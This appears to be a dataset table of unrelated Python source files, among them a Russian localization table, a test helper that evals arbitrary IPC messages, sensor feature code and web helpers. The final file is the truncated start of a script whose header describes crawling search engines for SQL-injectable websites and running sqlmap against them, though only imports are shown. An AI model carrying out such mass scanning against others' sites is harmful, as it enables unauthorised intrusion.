content | path | size
|---|---|---|
# Generated by scripts/localization_gen.py
def _config_pretty_models(_, count):
ot = 'о'
if count == 1:
et = 'ь'
ot = 'а'
elif count in [2, 3, 4]:
et = 'и'
else:
et = 'ей'
pretty = ['ноль', 'одна', 'две', 'три', 'четыре', 'пять', 'шесть']
count = pretty[count] if count < 7 else count
return 'Загружен{} {} модел{}'.format(ot, count, et)
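# Usage sketch, traced from the branches above (not from project docs):
#   _config_pretty_models(None, 1)  -> 'Загружена одна модель'
#   _config_pretty_models(None, 3)  -> 'Загружено три модели'
#   _config_pretty_models(None, 10) -> 'Загружено 10 моделей'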
LANG_CODE = {
'IETF': 'ru-RU',
'ISO': 'ru',
'aws': 'ru-RU',
}
YANDEX_EMOTION = {
'good': 'добрая',
'neutral': 'нейтральная',
'evil': 'злая',
}
YANDEX_SPEAKER = {
'jane': 'Джейн',
'oksana': 'Оксана',
'alyss': 'Алиса',
'omazh': 'Омар',
'zahar': 'Захар',
'ermil': 'Саня',
}
RHVOICE_SPEAKER = {
'anna': 'Аня',
'aleksandr': 'Александр',
'elena': 'Елена',
'irina': 'Ирина',
}
AWS_SPEAKER = {
'Tatyana': 'Татьяна',
'Maxim': 'Максим',
}
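# Translation table keyed by the source strings used in the code base; a value of
# None presumably means the (already Russian) key is used verbatim, while a callable
# such as _config_pretty_models builds the phrase at runtime.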
_LNG = {
# config.py
'Ошибка получения ключа для Yandex: {}': None,
'Ошибка сохранения {}: {}': None,
'Файл не найден (это нормально): {}': None,
'Ошибка загрузки {}: {}': None,
'Конфигурация сохранена за {}': None,
'Конфигурация сохранена!': None,
'Директория с моделями не найдена {}': None,
'Загружено {} моделей': _config_pretty_models,
'Файл настроек не найден по пути {}. Для первого запуска это нормально': None,
'Загружено {} опций за {}': None,
'Конфигурация загружена!': None,
'Ошибка инициализации языка {}: {}': None,
'Локализация {} загружена за {}': None,
'Конфигурация изменилась': None,
'Конфигурация не изменилась': None,
'Директория c tts кэшем не найдена {}': None,
'Удалены поврежденные файлы: {}': None,
'Размер tts кэша {}: {}': None,
'Ок.': None,
'Удаляем...': None,
'Удалено: {}': None,
'Удалено {} файлов. Новый размер TTS кэша {}': None,
'Директория {} не найдена. Создаю...': None,
# config.py terminal.py player.py
'Файл {} не найден.': None,
# config.py
'Это надо исправить!': None,
'Терминал еще не настроен, мой IP адрес: {}': None,
# listener.py stts.py
'Распознано за {}': None,
# listener.py
'Записано за {}': None,
'{} слушает': None,
'Голосовая активация по {}{}': None,
# loader.py
'Приветствую. Голосовой терминал настраивается, три... два... один...': None,
'Голосовой терминал завершает свою работу.': None,
# modules_manager.py
'Обычный': None,
# modules_manager.py modules.py
'Отладка': None,
# modules_manager.py
'Любой': None,
'восстановлен': None,
'удален': None,
'Отключенные модули: {}': None,
'Неактивные модули: {}': None,
'Активные модули: {}': None,
'Обнаружены конфликты в режиме {}: {}': None,
# modules_manager.py modules.py
'Вы ничего не сказали?': None,
# modules_manager.py
'Захвачено {}': None,
# terminal.py
'Пустая очередь? Impossible!': None,
'Получено {}:{}, lvl={} опоздание {} секунд.': None,
'{} Игнорирую.': None,
'Не верный вызов, WTF? {}:{}, lvl={}': None,
'Недопустимое значение: {}': None,
'Не настроено': None,
'Громкость {} процентов': None,
'Громкость музыки {} процентов': None,
'{} не поддерживает запись образцов.': None,
'первого': None,
'второго': None,
'третьего': None,
'Ошибка записи - недопустимый параметр': None,
'Запись {} образца на 5 секунд начнется после звукового сигнала': None,
'Запись {} образца завершена. Вы можете прослушать свою запись.': None,
'Ошибка сохранения образца {}: {}': None,
'Ошибка воспроизведения - файл {} не найден': None,
'{} не поддерживает тренировку моделей.': None,
' и еще {}': None,
'Ошибка компиляции - файлы {} не найдены в {}.': None,
'Ошибка компиляции - файлы не найдены.': None,
'Ошибка удаление модели номер {}': None,
'Модель номер {} удалена': None,
'Модель номер {} не найдена': None,
'Полный консенсус по модели {} не достигнут [{}/{}]. Советую пересоздать модель.': None,
'Полный консенсус по модели {} не достигнут. Компиляция отменена.': None,
'Компилирую {}': None,
'Ошибка компиляции модели {}: {}': None,
'Ошибка компиляции модели номер {}': None,
'Модель{} скомпилирована успешно за {}: {}': None,
'Модель{} номер {} скомпилирована успешно за {}': None,
# logger.py
'Логгирование в {} невозможно - отсутствуют права на запись. Исправьте это': None,
# modules.py
'блокировка': None,
'Блокировка снята': None,
'Блокировка включена': None,
'Блокировка': None,
'Включение/выключение блокировки терминала': None,
'выход': None,
'Внимание! Выход из режима разработчика': None,
'режим разработчика': None,
"Внимание! Включён режим разработчика. Для возврата в обычный режим скажите 'выход'": None,
'Режим настройки и отладки': None,
'Модуль {} не найден': None,
'Модуль {} системный, его нельзя настраивать': None,
'активировать': None,
'деактивировать': None,
'активировать везде': None,
'удалить': None,
'восстановить': None,
'Модуль {} удален. Вначале его нужно восстановить': None,
'Модуль {} уже в режиме {}': None,
'Теперь модуль {} доступен в режиме {}': None,
'Модуль {} и так {}': None,
'Модуль {} {}': None,
'Это невозможно, откуда тут {}': None,
'Менеджер': None,
'Управление модулями': None,
'Скажи': None,
'Произнесение фразы': None,
'Ничего': None,
'минус': None,
'плюс': None,
'до': None,
'от': None,
'Это слишком много для меня - считать {} чисел.': None,
'Я всё сосчитала': None,
'считалка': None,
'Считалка до числа. Или от числа до числа. Считалка произносит не больше 20 чисел за раз': None,
'сосчитай': None,
'считай': None,
'посчитай': None,
'Ошибка': None,
'Не поддерживается для {}': None,
' Я очень {}.': None,
'Меня зовут {}.{}': None,
'Кто я': None,
'Получение информации о настройках голосового генератора (только для Яндекса и RHVoice)': None,
'кто ты': None,
'какая ты': None,
'Теперь я': None,
'Изменение характера или голоса голосового генератора (только для Яндекса и RHVoice)': None,
'теперь ты': None,
'стань': None,
'Я уже {}.': None,
'Теперь меня зовут {}, а еще я {}.': None,
'без характера': None,
'Теперь я очень {} {}.': None,
'о': None,
'про': None,
'в': None,
'Ищу в вики о {}': None,
'Уточните свой вопрос: {}': None,
'Я ничего не знаю о {}.': None,
'Вики': None,
'Поиск в Википедии': None,
'расскажи': None,
'что ты знаешь': None,
'кто такой': None,
'что такое': None,
'зачем нужен': None,
'для чего': None,
'любую фразу': None,
'. Модуль удален': None,
'Модуль {} доступен в режиме {}. Для активации скажите {}. Модуль предоставляет {} {}': None,
'Скажите {}. Это активирует {}. Модуль предоставляет {}': None,
'Всего доступно {} модулей. Вот они:': None,
'Всего {} модулей удалены, это: {}': None,
'Работа модуля помощь завершена.': None,
'Помощь': None,
'Справку по модулям (вот эту)': None,
'помощь': None,
'справка': None,
'help': None,
'хелп': None,
'Come Along With Me.': None,
'Выход': None,
'Завершение работы голосового терминала': None,
'завершение работы': None,
'завершить работу': None,
'завершить': None,
'Терминал перезагрузится через 5... 4... 3... 2... 1...': None,
'Перезагрузка': None,
'Перезапуск голосового терминала': None,
'Ребут': None,
'Рестарт': None,
'reboot': None,
'громкость': None,
'Изменение громкости': None,
'громкость музыки': None,
'IP сервера не задан.': None,
'IP сервера не задан, исправьте это! Мой IP адрес: {}': None,
'Невозможно доставить - маршрут не найден': None,
'Скажи ': None,
'Мажордом': None,
'Отправку команд на сервер': None,
'Соответствие фразе не найдено: {}': None,
'Терминатор': None,
'Информацию что соответствие фразе не найдено': None,
# stts.py
'Неизвестный провайдер: {}': None,
'{} за {}{}: {}': None,
'{}найдено в кэше': None,
'{}сгенерированно {}': None,
"Ошибка синтеза речи от {}, ключ '{}'. ({})": None,
'Микрофоны не найдены': None,
'Доступны {}, от 0 до {}.': None,
'Не верный индекс микрофона {}. {}': None,
'Голос записан за {}': None,
'Во время записи произошел сбой, это нужно исправить': None,
'Ошибка распознавания - неизвестный провайдер {}': None,
'Для распознавания используем {}': None,
'Произошла ошибка распознавания': None,
"Ошибка распознавания речи от {}, ключ '{}'. ({})": None,
'Распознано: {}. Консенсус: {}': None,
'Привет': None,
'Слушаю': None,
'На связи': None,
'Привет-Привет': None,
'Я ничего не услышала': None,
'Вы ничего не сказали': None,
'Ничего не слышно': None,
'Не поняла': None,
'Ничего не слышно, повторите ваш запрос': None,
# notifier.py
'Запрос был успешен: {}': None,
'Ошибка коммуникации с сервером: {}': None,
# player.py
'Неизвестный тип файла: {}': None,
'Играю {} ...': None,
'Стримлю {} ...': None,
# updater.py
'Выполнен откат.': None,
'Во время обновления возникла ошибка': None,
'Вы используете последнюю версию терминала.': None,
'Файлы обновлены: {}': None,
'Терминал успешно обновлен.': None,
'Требуется перезапуск.': None,
'Во время обработки обновления или установки зависимостей возникла ошибка': None,
'Выполняется откат обновления.': None,
'Во время отката обновления возникла ошибка: {}': None,
'Откат невозможен.': None,
'Откат обновления выполнен успешно.': None,
'Зависимости {} {}обновлены: {}': None,
'не ': None,
# server.py
'Ошибка запуска сервера{}.': None,
' - адрес уже используется': None,
'Ошибка запуска сервера на {}:{}: {}': None,
# backup.py
'Запущено восстановление из бэкапа {}...': None,
'Восстановление не возможно: {}': None,
'Восстановление не удалось: {}': None,
'бэкап не создан': None,
'Восстановление завершено за {}, восстановлено {} файлов': None,
'Демон еще работает': None,
'Некорректное имя файла: {}': None,
'Файл не найден: {}': None,
'Архив поврежден: {}: {}': None,
'Ошибка создания бэкапа': None,
'Файл {} уже существует, отмена.': None,
'файл уже существует': None,
'Бэкап {} создан за {} [size: {}, compressed: {}, rate: {}%]': None,
'Бэкап успешно создан': None,
'Ошибка удаления старого бэкапа {}: {}': None,
'Удален старый бэкап {}': None,
# lib/base_music_controller.py
'Ошибка подключения к {}-серверу': None,
}
| src/languages/ru.py | 15,427 |
"""
A script that simulates a Python shell and accepts arbitrary commands to
execute. For use by service tests.
| Copyright 2017-2022, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
import os
os.environ["FIFTYONE_DISABLE_SERVICES"] = "1"
from fiftyone.service.ipc import IPCServer
env = {}
def handle_message(message):
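    # Try to compile the message as an expression first so its value can be
    # returned to the caller; statements raise SyntaxError in "eval" mode and
    # are recompiled (and run) in "exec" mode instead.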
try:
code = compile(message, "", "eval")
except SyntaxError:
code = compile(message, "", "exec")
return eval(code, env)
IPCServer(handle_message).serve_forever()
| tests/utils/interactive_python.py | 530 |
from typing import List
import numpy as np
import pandas as pd
from pyspark.sql.functions import pandas_udf, PandasUDFType
from pyspark.sql.types import *
# from pyspark.sql.functions import pandas_udf,PandasUDFType
from pyspark.sql.types import StructType
from cerebralcortex.core.datatypes import DataStream
from cerebralcortex.core.metadata_manager.stream.metadata import Metadata
def compute_corr_mse_accel_gyro(self, exclude_col_names: list = [],
accel_column_names: list = ['accelerometer_x', 'accelerometer_y', 'accelerometer_z'],
gyro_column_names: list = ['gyroscope_y', 'gyroscope_x', 'gyroscope_z'],
windowDuration: int = None,
slideDuration: int = None,
groupByColumnName: List[str] = [], startTime=None):
"""
Compute correlation and mean standard error of accel and gyro sensors
Args:
exclude_col_names list(str): name of the columns on which features should not be computed
accel_column_names list(str): name of accel data column
gyro_column_names list(str): name of gyro data column
windowDuration (int): duration of a window in seconds
slideDuration (int): slide duration of a window
groupByColumnName List[str]: groupby column names, for example, groupby user, col1, col2
startTime (datetime): The startTime is the offset with respect to 1970-01-01 00:00:00 UTC with which to start window intervals. For example, in order to have hourly tumbling windows that start 15 minutes past the hour, e.g. 12:15-13:15, 13:15-14:15... provide startTime as 15 minutes. First time of data will be used as startTime if none is provided
Returns:
DataStream object with all the existing data columns and FFT features
"""
feature_names = ["ax_ay_corr", 'ax_az_corr', 'ay_az_corr', 'gx_gy_corr', 'gx_gz_corr',
'gy_gz_corr', 'ax_ay_mse', 'ax_az_mse', 'ay_az_mse', 'gx_gy_mse', 'gx_gz_mse', 'gy_gz_mse']
    exclude_col_names = exclude_col_names + ["timestamp", "localtime", "user", "version"]  # copy instead of mutating the default list
data = self._data.drop(*exclude_col_names)
basic_schema = StructType([
StructField("timestamp", TimestampType()),
StructField("localtime", TimestampType()),
StructField("user", StringType()),
StructField("version", IntegerType()),
StructField("start_time", TimestampType()),
StructField("end_time", TimestampType())
])
features_list = []
for fn in feature_names:
features_list.append(StructField(fn, FloatType(), True))
features_schema = StructType(basic_schema.fields + features_list)
@pandas_udf(features_schema, PandasUDFType.GROUPED_MAP)
def get_corr_mse_features_udf(df):
timestamp = df['timestamp'].iloc[0]
localtime = df['localtime'].iloc[0]
user = df['user'].iloc[0]
version = df['version'].iloc[0]
start_time = timestamp
end_time = df['timestamp'].iloc[-1]
ax_ay_corr = df[accel_column_names[0]].corr(df[accel_column_names[1]])
ax_az_corr = df[accel_column_names[0]].corr(df[accel_column_names[2]])
ay_az_corr = df[accel_column_names[1]].corr(df[accel_column_names[2]])
gx_gy_corr = df[gyro_column_names[0]].corr(df[gyro_column_names[1]])
gx_gz_corr = df[gyro_column_names[0]].corr(df[gyro_column_names[2]])
gy_gz_corr = df[gyro_column_names[1]].corr(df[gyro_column_names[2]])
ax_ay_mse = ((df[accel_column_names[0]] - df[accel_column_names[1]]) ** 2).mean()
ax_az_mse = ((df[accel_column_names[0]] - df[accel_column_names[2]]) ** 2).mean()
ay_az_mse = ((df[accel_column_names[1]] - df[accel_column_names[2]]) ** 2).mean()
        gx_gy_mse = ((df[gyro_column_names[0]] - df[gyro_column_names[1]]) ** 2).mean()
        gx_gz_mse = ((df[gyro_column_names[0]] - df[gyro_column_names[2]]) ** 2).mean()
        gy_gz_mse = ((df[gyro_column_names[1]] - df[gyro_column_names[2]]) ** 2).mean()
basic_df = pd.DataFrame([[timestamp, localtime, user, int(version), start_time, end_time, ax_ay_corr,
ax_az_corr, ay_az_corr, gx_gy_corr, gx_gz_corr, gy_gz_corr, ax_ay_mse, ax_az_mse,
ay_az_mse, gx_gy_mse, gx_gz_mse, gy_gz_mse]],
columns=['timestamp', 'localtime', 'user', 'version', 'start_time', 'end_time',
"ax_ay_corr", 'ax_az_corr', 'ay_az_corr', 'gx_gy_corr', 'gx_gz_corr',
'gy_gz_corr', 'ax_ay_mse', 'ax_az_mse', 'ay_az_mse', 'gx_gy_mse',
'gx_gz_mse', 'gy_gz_mse'])
return basic_df
data = self.compute(get_corr_mse_features_udf, windowDuration=windowDuration, slideDuration=slideDuration,
groupByColumnName=groupByColumnName, startTime=startTime)
return DataStream(data=data._data, metadata=Metadata())
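# Hypothetical call, assuming this function is bound onto DataStream as a method and
# `ds` carries accel/gyro columns with the default names (window sizes are illustrative):
#   corr_mse_ds = ds.compute_corr_mse_accel_gyro(windowDuration=10, slideDuration=10)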
def compute_fourier_features(self, exclude_col_names: list = [],
feature_names=["fft_centroid", 'fft_spread', 'spectral_entropy',
'spectral_entropy_old', 'fft_flux',
'spectral_falloff'], windowDuration: int = None,
slideDuration: int = None,
groupByColumnName: List[str] = [], startTime=None):
"""
Transforms data from time domain to frequency domain.
Args:
exclude_col_names list(str): name of the columns on which features should not be computed
feature_names list(str): names of the features. Supported features are fft_centroid, fft_spread, spectral_entropy, spectral_entropy_old, fft_flux, spectral_falloff
windowDuration (int): duration of a window in seconds
slideDuration (int): slide duration of a window
groupByColumnName List[str]: groupby column names, for example, groupby user, col1, col2
startTime (datetime): The startTime is the offset with respect to 1970-01-01 00:00:00 UTC with which to start window intervals. For example, in order to have hourly tumbling windows that start 15 minutes past the hour, e.g. 12:15-13:15, 13:15-14:15... provide startTime as 15 minutes. First time of data will be used as startTime if none is provided
Returns:
DataStream object with all the existing data columns and FFT features
"""
eps = 0.00000001
    exclude_col_names = exclude_col_names + ["timestamp", "localtime", "user", "version"]  # copy instead of mutating the default list
data = self._data.drop(*exclude_col_names)
df_column_names = data.columns
basic_schema = StructType([
StructField("timestamp", TimestampType()),
StructField("localtime", TimestampType()),
StructField("user", StringType()),
StructField("version", IntegerType()),
StructField("start_time", TimestampType()),
StructField("end_time", TimestampType())
])
features_list = []
for cn in df_column_names:
for sf in feature_names:
features_list.append(StructField(cn + "_" + sf, FloatType(), True))
features_schema = StructType(basic_schema.fields + features_list)
def stSpectralCentroidAndSpread(X, fs):
"""Computes spectral centroid of frame (given abs(FFT))"""
ind = (np.arange(1, len(X) + 1)) * (fs / (2.0 * len(X)))
Xt = X.copy()
Xt = Xt / Xt.max()
NUM = np.sum(ind * Xt)
DEN = np.sum(Xt) + eps
# Centroid:
C = (NUM / DEN)
# Spread:
S = np.sqrt(np.sum(((ind - C) ** 2) * Xt) / DEN)
# Normalize:
C = C / (fs / 2.0)
S = S / (fs / 2.0)
return (C, S)
def stSpectralFlux(X, Xprev):
"""
Computes the spectral flux feature of the current frame
ARGUMENTS:
X: the abs(fft) of the current frame
Xpre: the abs(fft) of the previous frame
"""
# compute the spectral flux as the sum of square distances:
sumX = np.sum(X + eps)
sumPrevX = np.sum(Xprev + eps)
F = np.sum((X / sumX - Xprev / sumPrevX) ** 2)
return F
def stSpectralRollOff(X, c, fs):
"""Computes spectral roll-off"""
totalEnergy = np.sum(X ** 2)
fftLength = len(X)
Thres = c * totalEnergy
        # Find the spectral rolloff as the frequency position where the respective spectral energy is equal to c*totalEnergy
CumSum = np.cumsum(X ** 2) + eps
[a, ] = np.nonzero(CumSum > Thres)
if len(a) > 0:
mC = np.float64(a[0]) / (float(fftLength))
else:
mC = 0.0
return (mC)
def stSpectralEntropy(X, numOfShortBlocks=10):
"""Computes the spectral entropy"""
L = len(X) # number of frame samples
Eol = np.sum(X ** 2) # total spectral energy
subWinLength = int(np.floor(L / numOfShortBlocks)) # length of sub-frame
if L != subWinLength * numOfShortBlocks:
X = X[0:subWinLength * numOfShortBlocks]
subWindows = X.reshape(subWinLength, numOfShortBlocks,
order='F').copy() # define sub-frames (using matrix reshape)
s = np.sum(subWindows ** 2, axis=0) / (Eol + eps) # compute spectral sub-energies
En = -np.sum(s * np.log2(s + eps)) # compute spectral entropy
return En
def spectral_entropy(data, sampling_freq, bands=None):
psd = np.abs(np.fft.rfft(data)) ** 2
psd /= np.sum(psd) # psd as a pdf (normalised to one)
if bands is None:
power_per_band = psd[psd > 0]
else:
freqs = np.fft.rfftfreq(data.size, 1 / float(sampling_freq))
bands = np.asarray(bands)
freq_limits_low = np.concatenate([[0.0], bands])
freq_limits_up = np.concatenate([bands, [np.Inf]])
            power_per_band = np.asarray([np.sum(psd[np.bitwise_and(freqs >= low, freqs < up)])
                                         for low, up in zip(freq_limits_low, freq_limits_up)])
            power_per_band = power_per_band[power_per_band > 0]  # ndarray, so the boolean mask works
return -np.sum(power_per_band * np.log2(power_per_band))
def fourier_features_pandas_udf(data, frequency: float = 16.0):
Fs = frequency # the sampling freq (in Hz)
results = []
# fourier transforms!
# data_fft = abs(np.fft.rfft(data))
X = abs(np.fft.fft(data))
nFFT = int(len(X) / 2) + 1
X = X[0:nFFT] # normalize fft
X = X / len(X)
if "fft_centroid" or "fft_spread" in feature_names:
C, S = stSpectralCentroidAndSpread(X, Fs) # spectral centroid and spread
if "fft_centroid" in feature_names:
results.append(C)
if "fft_spread" in feature_names:
results.append(S)
if "spectral_entropy" in feature_names:
se = stSpectralEntropy(X) # spectral entropy
results.append(se)
if "spectral_entropy_old" in feature_names:
            se_old = spectral_entropy(X, frequency)  # spectral entropy (PSD-based variant)
results.append(se_old)
if "fft_flux" in feature_names:
flx = stSpectralFlux(X, X.copy()) # spectral flux
results.append(flx)
if "spectral_folloff" in feature_names:
roff = stSpectralRollOff(X, 0.90, frequency) # spectral rolloff
results.append(roff)
return pd.Series(results)
@pandas_udf(features_schema, PandasUDFType.GROUPED_MAP)
def get_fft_features(df):
timestamp = df['timestamp'].iloc[0]
localtime = df['localtime'].iloc[0]
user = df['user'].iloc[0]
version = df['version'].iloc[0]
start_time = timestamp
end_time = df['timestamp'].iloc[-1]
df.drop(exclude_col_names, axis=1, inplace=True)
df_ff = df.apply(fourier_features_pandas_udf)
df3 = df_ff.T
        pd.set_option('display.max_colwidth', None)
# split column into multiple columns
# df3 = pd.DataFrame(df_ff.values.tolist(), index=df_ff.index)
# print("**"*50)
# print(type(df), type(df_ff), type(df3))
# print(df)
# print(df_ff)
# print(df_ff.values.tolist())
# print(df3)
# print("**" * 50)
# print("FEATURE-NAMES", feature_names)
df3.columns = feature_names
# multiple rows to one row
output = df3.unstack().to_frame().sort_index(level=1).T
output.columns = [f'{j}_{i}' for i, j in output.columns]
basic_df = pd.DataFrame([[timestamp, localtime, user, int(version), start_time, end_time]],
columns=['timestamp', 'localtime', 'user', 'version', 'start_time', 'end_time'])
# df.insert(loc=0, columns=, value=basic_cols)
return basic_df.assign(**output)
return self.compute(get_fft_features, windowDuration=windowDuration, slideDuration=slideDuration,
                        groupByColumnName=groupByColumnName, startTime=startTime)
| cerebralcortex/markers/brushing/features.py | 13,159 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('addressbook', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='address',
name='country',
field=models.CharField(max_length=3, verbose_name='country'),
),
]
| addressbook/migrations/0002_auto_20150903_2227.py | 420 |
# coding: utf-8
"""
Files
Upload and manage files. # noqa: E501
The version of the OpenAPI document: v3
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from hubspot.files.files.configuration import Configuration
class NextPage(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {"after": "str", "link": "str"}
attribute_map = {"after": "after", "link": "link"}
def __init__(self, after=None, link=None, local_vars_configuration=None): # noqa: E501
"""NextPage - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._after = None
self._link = None
self.discriminator = None
self.after = after
if link is not None:
self.link = link
@property
def after(self):
"""Gets the after of this NextPage. # noqa: E501
:return: The after of this NextPage. # noqa: E501
:rtype: str
"""
return self._after
@after.setter
def after(self, after):
"""Sets the after of this NextPage.
:param after: The after of this NextPage. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and after is None: # noqa: E501
raise ValueError("Invalid value for `after`, must not be `None`") # noqa: E501
self._after = after
@property
def link(self):
"""Gets the link of this NextPage. # noqa: E501
:return: The link of this NextPage. # noqa: E501
:rtype: str
"""
return self._link
@link.setter
def link(self, link):
"""Sets the link of this NextPage.
:param link: The link of this NextPage. # noqa: E501
:type: str
"""
self._link = link
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items()))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NextPage):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, NextPage):
return True
return self.to_dict() != other.to_dict()
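# Usage sketch (field values are illustrative only):
#   page = NextPage(after="MTA1", link="https://api.hubapi.com/example?after=MTA1")
#   page.to_dict()  # -> {'after': 'MTA1', 'link': 'https://api.hubapi.com/example?after=MTA1'}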
| hubspot/files/files/models/next_page.py | 3,697 |
import os
import sys
import pandas as pd
import numpy as np
import pdb
import torch
import torch.nn as nn
import torch.nn.functional as F
sys.path.insert(1,"../")
sys.path.insert(1,"../../")
sys.path.insert(1,"../../../")
sys.path.insert(1,"../../../../")
sys.path.insert(1,"../../../../../")
from config_u import base
from data_generators import cpmg_generator_1A
from load_fully_quantified_cpmg_data import fq_v_ppm_spectra, fq_v_spectra, fq_v_statistics, fq_v_quant, fq_v_class_labels, fq_v_metabolite_names, fq_v_fold_dct, SEED
from metabolite_mapping import dataset2folder, folder2dataset
# task configuration
task = "gaba"
dataset_task = folder2dataset[task]
task_target_idx = fq_v_metabolite_names.index(dataset_task)
# data configuration
ppm_spectra = fq_v_ppm_spectra
spectra = fq_v_spectra
statistics = fq_v_statistics
quant = fq_v_quant[:,task_target_idx].reshape((-1,1))
class_labels = fq_v_class_labels
metabolite_names = [fq_v_metabolite_names[task_target_idx]]
fold_dct = fq_v_fold_dct
K = 5
generator = cpmg_generator_1A
# save and log configuration
model_name = f"full_ppm_spectrum_network_per_metabolite/{task}/seed_{SEED}/"
model_base_path = os.path.join(base, "models/cpmg/automated_metabolite_quantification/"+model_name)
log_base_path = os.path.join(base, "logs/cpmg/automated_metabolite_quantification/"+model_name)
plot_base_path = os.path.join(base, "plots/cpmg/automated_metabolite_quantification/"+model_name)
# neural network model configuration
num_epochs = 2000
weight_seed = SEED
hp_space = {
"ETA": 10**-2.1,
"weight_decay": 0.00001
}
# gpu/cpu device selection
gpu_id = int(input("GPU index: "))
if torch.cuda.is_available():
device = torch.device(f"cuda:{gpu_id}")
print(f"GPU {gpu_id} is available")
else:
device = torch.device("cpu")
print("GPU is not available")
# Quantification model
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
self.all_mutual = nn.Linear(1401, 192)
self.m1 = nn.Linear(192,1)
def forward(self, x):
inp = F.relu(self.all_mutual(x))
m1 = F.relu(self.m1(inp)).squeeze()
return m1
# weight initialization
def initialize_weights(m):
if type(m) == nn.Linear:
torch.nn.init.kaiming_uniform_(m.weight)
m.bias.data.fill_(0.01)
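# Minimal wiring sketch (the training loop lives elsewhere; the optimizer choice here is an assumption):
#   model = Model().to(device)
#   model.apply(initialize_weights)
#   optimizer = torch.optim.Adam(model.parameters(), lr=hp_space["ETA"], weight_decay=hp_space["weight_decay"])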
# measurement metric and timing storage
metric_names = ["mae", "mse", "mape", "r2", "absolute_percentage_error"]
metrics = {}
for name in metric_names:
metrics[name] = {}
for metabolite_name in metabolite_names:
metrics[name][metabolite_name] = []
timing_mode = ["train", "test"]
runtime = {}
for mode in timing_mode:
    runtime[mode] = []
| train_with_your_data/scripts/cpmg/automated_metabolite_quantification/full_ppm_spectrum_network_per_metabolite/gaba/config.py | 2,758 |
from flask import session, jsonify, redirect, request, Response, abort
from flask_login import current_user
from werkzeug.utils import secure_filename
from functools import wraps
from srht.objects import User
from srht.database import db, Base
from srht.config import _cfg
import json
import os
import urllib
import requests
import xml.etree.ElementTree as ET
import hashlib
def firstparagraph(text):
try:
para = text.index("\n\n")
return text[:para + 2]
except:
try:
para = text.index("\r\n\r\n")
return text[:para + 4]
except:
return text
def with_session(f):
@wraps(f)
def go(*args, **kw):
try:
ret = f(*args, **kw)
db.commit()
return ret
except:
db.rollback()
db.close()
raise
return go
def loginrequired(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not current_user or not current_user.approved:
return redirect("/login?return_to=" + urllib.parse.quote_plus(request.url))
else:
return f(*args, **kwargs)
return wrapper
def adminrequired(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not current_user or not current_user.approved:
return redirect("/login?return_to=" + urllib.parse.quote_plus(request.url))
else:
if not current_user.admin:
abort(401)
return f(*args, **kwargs)
return wrapper
def json_output(f):
@wraps(f)
def wrapper(*args, **kwargs):
def jsonify_wrap(obj):
jsonification = json.dumps(obj)
return Response(jsonification, mimetype='application/json')
result = f(*args, **kwargs)
if isinstance(result, tuple):
return jsonify_wrap(result[0]), result[1]
if isinstance(result, dict):
return jsonify_wrap(result)
if isinstance(result, list):
return jsonify_wrap(result)
# This is a fully fleshed out response, return it immediately
return result
return wrapper
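# Hypothetical Flask view using the decorator above (route and payload are illustrative):
#   @app.route("/api/ping")
#   @json_output
#   def api_ping():
#       return {"ok": True}, 200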
def cors(f):
@wraps(f)
def wrapper(*args, **kwargs):
res = f(*args, **kwargs)
if request.headers.get('x-cors-status', False):
if isinstance(res, tuple):
json_text = res[0].data
code = res[1]
else:
json_text = res.data
code = 200
o = json.loads(json_text)
o['x-status'] = code
return jsonify(o)
return res
return wrapper
def file_link(path):
return _cfg("protocol") + "://" + _cfg("domain") + "/" + path
def disown_link(path):
return _cfg("protocol") + "://" + _cfg("domain") + "/disown?filename=" + path
# https://stackoverflow.com/questions/4453602/how-to-find-the-mountpoint-a-file-resides-on/4453715#4453715
def find_mount_point(path):
path = os.path.abspath(path)
while not os.path.ismount(path):
path = os.path.dirname(path)
return path
| srht/common.py | 3,063 |
"""
For...in in Python
Iterating over strings with for...in
The range function takes these arguments (start=0, stop, step=1)
"""
texto = input('informe seu CPF: ')
texto_novo = ''
for letra in range(len(texto)):
if letra % 3 == 0:
texto_novo += '.' + texto[letra]
continue
texto_novo += texto[letra]
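# Example: for input '12345678901' the loop builds '.123.456.789.01';
# the slice below drops the leading dot, printing '123.456.789.01'.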
print(texto_novo[1:])
| basico/aula019/aula019.py | 341 |
#!/usr/bin/env python3
#
# Python script for finding websites which are prone to SQL injections
# Do crawling on bing or google for possible vuln urls
# Check url with quote ' and catch error messages
# Run sqlmap against urls
#
# License:
# MIT - (c) 2016 ThomasTJ (TTJ)
#
import sys # Quit the shiat
import os # Working with files and starting sqlmap
import re # Searching web results for vuln
import requests # Calling websites
import urllib.parse # Parsing url encoding for search
import shutil # Checking if SQLmap is installed
import psutil # Checking possible VPN connection
import http.client # Ping to check network connection
import random # Shuffle between user agents
import time # Printing time when scraping and checking urls
from time import sleep # Multiple use cases, e.g. sleep between requests
from bs4 import BeautifulSoup # Working with website date
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
